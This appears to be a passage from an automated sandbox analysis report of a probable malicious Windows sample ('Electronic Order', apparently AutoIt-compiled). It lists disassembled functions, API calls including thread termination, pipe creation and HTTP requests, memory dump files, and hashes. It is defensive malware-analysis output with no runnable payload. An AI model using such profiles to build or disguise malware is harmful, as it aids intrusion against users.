                                      • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E256E0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                      • String ID:
                                      • API String ID: 839392675-0
                                      • Opcode ID: 294f83ce871208edbb75ffe1bc569bc80dc5e8588417aab6112d41d680116477
                                      • Instruction ID: d8adb0f239460f1b03c5a74e88596cff695267e07fbe04e96057d49b65332dbf
                                      • Opcode Fuzzy Hash: 294f83ce871208edbb75ffe1bc569bc80dc5e8588417aab6112d41d680116477
                                      • Instruction Fuzzy Hash: 34F06D36241158BFE3205BA3AC0DEAB7A7CEBC7F11F0001A9FA00E105196A01A0686B5
                                      Function 00E274D2 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • InterlockedExchange.KERNEL32(?,?), ref: 00E274E5
                                      • EnterCriticalSection.KERNEL32(?,?,00DD1044,?,?), ref: 00E274F6
                                      • TerminateThread.KERNEL32(00000000,000001F6,?,00DD1044,?,?), ref: 00E27503
                                      • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00DD1044,?,?), ref: 00E27510
                                        • Part of subcall function 00E26ED7: CloseHandle.KERNEL32(00000000,?,00E2751D,?,00DD1044,?,?), ref: 00E26EE1
                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 00E27523
                                      • LeaveCriticalSection.KERNEL32(?,?,00DD1044,?,?), ref: 00E2752A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                      • String ID:
                                      • API String ID: 3495660284-0
                                      • Opcode ID: ffbb917c861d475d27f56b2c38309f3375269ffb4b54151bfe0609a075f66f6f
                                      • Instruction ID: 111a62710f17d7ef2d2d97668a75b46517226ae2fc39bb92bc5753480ad4c6d2
                                      • Opcode Fuzzy Hash: ffbb917c861d475d27f56b2c38309f3375269ffb4b54151bfe0609a075f66f6f
                                      • Instruction Fuzzy Hash: 10F05E3E540A22EFEB111B65FC8C9EB776AEF46B02B001531F602B10B1CBB55906CB54
                                      Function 00E18E74 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                      Download Yara Rule
                                      APIs
                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00E18E7F
                                      • UnloadUserProfile.USERENV(?,?), ref: 00E18E8B
                                      • CloseHandle.KERNEL32(?), ref: 00E18E94
                                      • CloseHandle.KERNEL32(?), ref: 00E18E9C
                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00E18EA5
                                      • HeapFree.KERNEL32(00000000), ref: 00E18EAC
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                      • String ID:
                                      • API String ID: 146765662-0
                                      • Opcode ID: 79e54bb73e72a93563807899bbe13a6b078f6c5da9605a5b378bea5a1d8e56f1
                                      • Instruction ID: ddc7595a3c5debe27343e73dc1c7b3b26dfc140c251f054a50ea0752258c9135
                                      • Opcode Fuzzy Hash: 79e54bb73e72a93563807899bbe13a6b078f6c5da9605a5b378bea5a1d8e56f1
                                      • Instruction Fuzzy Hash: 3BE0C23A004001FFDA011FE2EC0C90ABBA9FB8AB22B108231F219A1571CB32942ADB50
                                      Function 00E17A78 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 231COMMON
                                      Download Yara Rule
                                      APIs
                                      • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00E52C7C,?), ref: 00E17C32
                                      • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00E52C7C,?), ref: 00E17C4A
                                      • CLSIDFromProgID.OLE32(?,?,00000000,00E4FB80,000000FF,?,00000000,00000800,00000000,?,00E52C7C,?), ref: 00E17C6F
                                      • _memcmp.LIBCMT ref: 00E17C90
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: FromProg$FreeTask_memcmp
                                      • String ID: ,,
                                      • API String ID: 314563124-1556401989
                                      • Opcode ID: 8ef31edc093d60177ea2f69178d91880a47ddb8a0b3ff14efbffff7b528786fc
                                      • Instruction ID: 7516fff94688a0366f29c177c00b6547b998b52274db05aff1e9c073fd7791a9
                                      • Opcode Fuzzy Hash: 8ef31edc093d60177ea2f69178d91880a47ddb8a0b3ff14efbffff7b528786fc
                                      • Instruction Fuzzy Hash: D4812A76A04109EFCB04DF94C884EEEB7B9FF89715F204198E546BB250DB31AE46CB60
                                      Function 00E38902 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON
                                      Download Yara Rule
                                      APIs
                                      • VariantInit.OLEAUT32(?), ref: 00E38928
                                      • CharUpperBuffW.USER32(?,?), ref: 00E38A37
                                      • VariantClear.OLEAUT32(?), ref: 00E38BAF
                                        • Part of subcall function 00E27804: VariantInit.OLEAUT32(00000000), ref: 00E27844
                                        • Part of subcall function 00E27804: VariantCopy.OLEAUT32(00000000,?), ref: 00E2784D
                                        • Part of subcall function 00E27804: VariantClear.OLEAUT32(00000000), ref: 00E27859
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Variant$ClearInit$BuffCharCopyUpper
                                      • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                      • API String ID: 4237274167-1221869570
                                      • Opcode ID: 1315fcc3d6228d7fc5024550b85ea0e5842ce45ea1464a63bbd6e11435d94cfe
                                      • Instruction ID: 7edae620b705d002e9b25eb6e435f9c148f3d7e0ed534d336dbee036116c8f70
                                      • Opcode Fuzzy Hash: 1315fcc3d6228d7fc5024550b85ea0e5842ce45ea1464a63bbd6e11435d94cfe
                                      • Instruction Fuzzy Hash: 6D91AF746083029FC710DF24C588E5ABBE4EFC8704F14996EF89A9B361DB31E945CB62
                                      Function 00E22F86 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00DDFEC6: _wcscpy.LIBCMT ref: 00DDFEE9
                                      • _memset.LIBCMT ref: 00E23077
                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00E230A6
                                      • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00E23159
                                      • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00E23187
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: ItemMenu$Info$Default_memset_wcscpy
                                      • String ID: 0
                                      • API String ID: 4152858687-4108050209
                                      • Opcode ID: db4df88e99f5e599ce6148995c9054e5bf72b34c18579796cba2fc14039a3d46
                                      • Instruction ID: aacac3739eca154b2e401000a5586ea5da38a162158fa501eb2b3751fcbcd81e
                                      • Opcode Fuzzy Hash: db4df88e99f5e599ce6148995c9054e5bf72b34c18579796cba2fc14039a3d46
                                      • Instruction Fuzzy Hash: F651E1316093609ED725AF38E845A6BB7E4EF85314F041A2DF885F3191DB78CE548B62
                                      Function 00E22C42 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _memset.LIBCMT ref: 00E22CAF
                                      • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00E22CCB
                                      • DeleteMenu.USER32(?,00000007,00000000), ref: 00E22D11
                                      • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00E86890,00000000), ref: 00E22D5A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Menu$Delete$InfoItem_memset
                                      • String ID: 0
                                      • API String ID: 1173514356-4108050209
                                      • Opcode ID: 7b8f268537fd8c0fa0413f7266c0c5d5fe848544dd0cb16a6682121b67af59a1
                                      • Instruction ID: 9cb72ea3ca719c0a7ff31c2693965b306cdbb7c3def2010ca027bcce8f78cb4a
                                      • Opcode Fuzzy Hash: 7b8f268537fd8c0fa0413f7266c0c5d5fe848544dd0cb16a6682121b67af59a1
                                      • Instruction Fuzzy Hash: B441C130204312AFD724DF24E845B5BBBE8EF85324F00461DFA65A72E1DB70E905CBA2
                                      Function 00E3DAB9 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
                                      Download Yara Rule
                                      APIs
                                      • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00E3DAD9
                                        • Part of subcall function 00DC79AB: _memmove.LIBCMT ref: 00DC79F9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: BuffCharLower_memmove
                                      • String ID: cdecl$none$stdcall$winapi
                                      • API String ID: 3425801089-567219261
                                      • Opcode ID: 1e1adf7c760cb5242f0dacc520013de4a40c481314545457351d10f0c3b242c8
                                      • Instruction ID: c43cd1b00141bbefad64ced34415a69909ed4c6a1e57def2ce22772583f39a75
                                      • Opcode Fuzzy Hash: 1e1adf7c760cb5242f0dacc520013de4a40c481314545457351d10f0c3b242c8
                                      • Instruction Fuzzy Hash: 6731A17090421AAFCF00EF94DC819EEF7B4FF45324F108629E865A76D1CB71A905CBA0
                                      Function 00E19372 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00DC7F41: _memmove.LIBCMT ref: 00DC7F82
                                        • Part of subcall function 00E1B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00E1B0E7
                                      • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00E193F6
                                      • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00E19409
                                      • SendMessageW.USER32(?,00000189,?,00000000), ref: 00E19439
                                        • Part of subcall function 00DC7D2C: _memmove.LIBCMT ref: 00DC7D66
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: MessageSend$_memmove$ClassName
                                      • String ID: ComboBox$ListBox
                                      • API String ID: 365058703-1403004172
                                      • Opcode ID: b92a0ab68be51bb5a9a9ab383b9aa5b1358fa89cc57c183b03a2bcc7a58c40b6
                                      • Instruction ID: afd20c476b48ebfccb6036bc3d517db7b97f0d66dcf2ef4ec2fe75fa3e77b7be
                                      • Opcode Fuzzy Hash: b92a0ab68be51bb5a9a9ab383b9aa5b1358fa89cc57c183b03a2bcc7a58c40b6
                                      • Instruction Fuzzy Hash: C7210471900104BEDB14ABB1DC95DFFB778DF05750B105119F836B71E2DB34198A9A30
                                      Function 00DC410D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00DFD5EC
                                        • Part of subcall function 00DC7D2C: _memmove.LIBCMT ref: 00DC7D66
                                      • _memset.LIBCMT ref: 00DC418D
                                      • _wcscpy.LIBCMT ref: 00DC41E1
                                      • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00DC41F1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                      • String ID: Line:
                                      • API String ID: 3942752672-1585850449
                                      • Opcode ID: e5aaa215f1ff02ece642e4261f0442955a1c8eef62c02d7030f143a514f7bf72
                                      • Instruction ID: 7cd1438e66e611c8db676ffe88b7f1f11bce71d20255a6bbd90db7db7a85e8eb
                                      • Opcode Fuzzy Hash: e5aaa215f1ff02ece642e4261f0442955a1c8eef62c02d7030f143a514f7bf72
                                      • Instruction Fuzzy Hash: 5D31B3710083469ED721EB60DC46FDB77ECAF54310F14455EF199A30A1DB70A648CBB2
                                      Function 00E31B21 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00E31B40
                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00E31B66
                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00E31B96
                                      • InternetCloseHandle.WININET(00000000), ref: 00E31BDD
                                        • Part of subcall function 00E32777: GetLastError.KERNEL32(?,?,00E31B0B,00000000,00000000,00000001), ref: 00E3278C
                                        • Part of subcall function 00E32777: SetEvent.KERNEL32(?,?,00E31B0B,00000000,00000000,00000001), ref: 00E327A1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                      • String ID:
                                      • API String ID: 3113390036-3916222277
                                      • Opcode ID: 72327e2d142dc9ef2157d2ed4feffbfe1343ab0c1c1dae1e0f9a722246038b49
                                      • Instruction ID: 6723d3ccf1011c150b6cf220311688ace2ae09ac76c273c7a0d4d86a8f7e796b
                                      • Opcode Fuzzy Hash: 72327e2d142dc9ef2157d2ed4feffbfe1343ab0c1c1dae1e0f9a722246038b49
                                      • Instruction Fuzzy Hash: C421CFB5500208BFEB119F219C89EFFBAECEB89B48F10116EF505B2240EA349D099771
                                      Function 00E46656 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00DC1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00DC1D73
                                        • Part of subcall function 00DC1D35: GetStockObject.GDI32(00000011), ref: 00DC1D87
                                        • Part of subcall function 00DC1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00DC1D91
                                      • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00E466D0
                                      • LoadLibraryW.KERNEL32(?), ref: 00E466D7
                                      • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00E466EC
                                      • DestroyWindow.USER32(?), ref: 00E466F4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                      • String ID: SysAnimate32
                                      • API String ID: 4146253029-1011021900
                                      • Opcode ID: df05d184af9b8e4e2086d9a59999b4938faf36c334e1a9817cd97c8506f4a902
                                      • Instruction ID: e0ac8b71bcdade8c87a800d51fbda7c1a7f3d8a80aa5a01c77415da31fcfb031
                                      • Opcode Fuzzy Hash: df05d184af9b8e4e2086d9a59999b4938faf36c334e1a9817cd97c8506f4a902
                                      • Instruction Fuzzy Hash: 1C21CDB1200206AFEF104F64FC80EBB37ADEB5A768F126629F911B3190C771CC519762
                                      Function 00E2703E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetStdHandle.KERNEL32(0000000C), ref: 00E2705E
                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00E27091
                                      • GetStdHandle.KERNEL32(0000000C), ref: 00E270A3
                                      • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00E270DD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: CreateHandle$FilePipe
                                      • String ID: nul
                                      • API String ID: 4209266947-2873401336
                                      • Opcode ID: 757d3231e4ffe2c18221c43ba12a6bfe3a4c6a0ec397144eebf5f14b3cab66b9
                                      • Instruction ID: 791bf8565f34946719bc08bc6ffe9beea46146567b5e3052288e4b12fad994b5
                                      • Opcode Fuzzy Hash: 757d3231e4ffe2c18221c43ba12a6bfe3a4c6a0ec397144eebf5f14b3cab66b9
                                      • Instruction Fuzzy Hash: 13218174604229ABDF209F29EC05E9A77E8AF45724F205619FCE1F72D0E7B09848CB50
                                      Function 00E2710C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetStdHandle.KERNEL32(000000F6), ref: 00E2712B
                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00E2715D
                                      • GetStdHandle.KERNEL32(000000F6), ref: 00E2716E
                                      • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00E271A8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: CreateHandle$FilePipe
                                      • String ID: nul
                                      • API String ID: 4209266947-2873401336
                                      • Opcode ID: 8acf7273aec275c51063e956ddd4ab214fa41baf7d8c498dd51e042a4c4314f3
                                      • Instruction ID: cc5331bb5c9fb25a15aa06f521b2fa4950e4180d37cb65df89cb659f409a8806
                                      • Opcode Fuzzy Hash: 8acf7273aec275c51063e956ddd4ab214fa41baf7d8c498dd51e042a4c4314f3
                                      • Instruction Fuzzy Hash: 8921B3756053259BDF209F69AC04AAAB7E8AF55724F201719FCF1F32D0D7B09861CB50
                                      Function 00E2AEAB Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetErrorMode.KERNEL32(00000001), ref: 00E2AEBF
                                      • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00E2AF13
                                      • __swprintf.LIBCMT ref: 00E2AF2C
                                      • SetErrorMode.KERNEL32(00000000,00000001,00000000,00E4F910), ref: 00E2AF6A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: ErrorMode$InformationVolume__swprintf
                                      • String ID: %lu
                                      • API String ID: 3164766367-685833217
                                      • Opcode ID: 07ae0353110ddeb65e3d76f57ecc5acda12db2544f629e7815f36dcf04276567
                                      • Instruction ID: 8185d6e25213ef9c6d7722b44d7983ed5f9ec7471d545cc1726d67b6b14397c4
                                      • Opcode Fuzzy Hash: 07ae0353110ddeb65e3d76f57ecc5acda12db2544f629e7815f36dcf04276567
